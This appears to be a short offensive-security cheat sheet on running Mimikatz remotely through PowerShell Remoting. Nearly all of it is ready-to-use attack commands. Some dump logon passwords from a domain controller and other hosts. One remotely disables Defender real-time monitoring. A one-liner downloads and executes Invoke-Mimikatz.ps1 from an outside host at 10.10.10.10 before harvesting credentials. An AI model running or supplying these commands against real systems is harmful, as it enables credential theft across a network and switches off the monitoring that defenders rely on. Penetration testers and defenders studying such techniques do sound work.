Skip to content

๐ŸŒ Remote Execution

๐Ÿ”ง PowerShell Remoting

# Basic remote execution
Invoke-Mimikatz -ComputerName DC01 -Command '"privilege::debug" "sekurlsa::logonpasswords"'

# Multiple computers
Invoke-Mimikatz -ComputerName DC01,SERVER01,WS01 -Command '"sekurlsa::logonpasswords"'

๐Ÿ” Mass Credential Harvesting

# Disable monitoring remotely
Invoke-Command -ComputerName DC01 -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true}

# One-liner remote dump
Invoke-Command -ComputerName DC01 -ScriptBlock {IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'}